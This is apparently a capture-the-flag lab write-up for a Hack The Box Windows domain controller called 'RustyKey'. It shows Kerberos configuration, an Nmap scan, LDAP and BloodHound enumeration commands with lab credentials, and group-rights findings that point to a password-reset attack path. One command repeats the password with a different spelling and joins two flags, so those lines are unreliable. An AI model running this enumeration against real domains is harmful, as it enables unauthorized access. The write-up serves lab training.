IP
10.10.11.75
Configure Domain/Hosts
dc.rustykey.htb rustykey.htb
And Kerberos Config
GNU nano 8.4
/etc/krb5.conf
k[libdefaults]
default_realm = RUSTYKEY.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = yes
default_tkt_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
default_tgs_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
permitted_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
[realms]
RUSTYKEY.HTB = {
kdc = 10.10.11.75
}
[domain_realm]
.rustykey.htb = RUSTYKEY.HTB
rustykey.htb = RUSTYKEY.HTB
Nmap Results
Host is up, received conn-refused (0.091s latency).
Scanned at 2025-06-29 00:28:38 IST for 77s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-06
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain:
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp filtered ldapssl no-response
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain:
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49672/tcp open msrpc syn-ack Microsoft Windows RPC
49673/tcp open msrpc syn-ack Microsoft Windows RPC
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49689/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
User Enumeration
Despite many Active Directory environments that require
pure Kerberos authentication, the LDAP server in this environment allows login via Simple Bind
with a username and password.
With the following command, we were able to successfully query all user objects, including userPrincipalName
ldapsearch -x -H ldap://10.10.11.75 -D '[email protected]' -w '8#t5HE8L!W3A' -b
'dc=rustykey,dc=htb' "(objectClass=user)" userPrincipalName
We successfully authenticate ourselves via Simple Bind with username and password
Bloodhound Enumeration
We request a Ticket via Kerberos
getTGT.py -dc-ip 10.10.11.75 rustykey.htb/rr.parker:'8#t5HE8L!W3A'
We set the Kerberos ticket as the active session
export KRB5CCNAME=rr.parker.ccache
We are checking the active Kerberos ticket
klist
We run BloodHound with Kerberos authentication
bloodhound-python -u 'rr.parker' -p '8#t5HEL!W3A' -c All -d rustykey.htb -ns 10.10.11.75 --zip-k
The computer ACC IT_COMPUTER3$
can add itself to the HELPDESK GROUP
The HELPDESK group can change the password of the following four users
- bb.morgan
- gg.anderson
- dd.ali
- ee.reed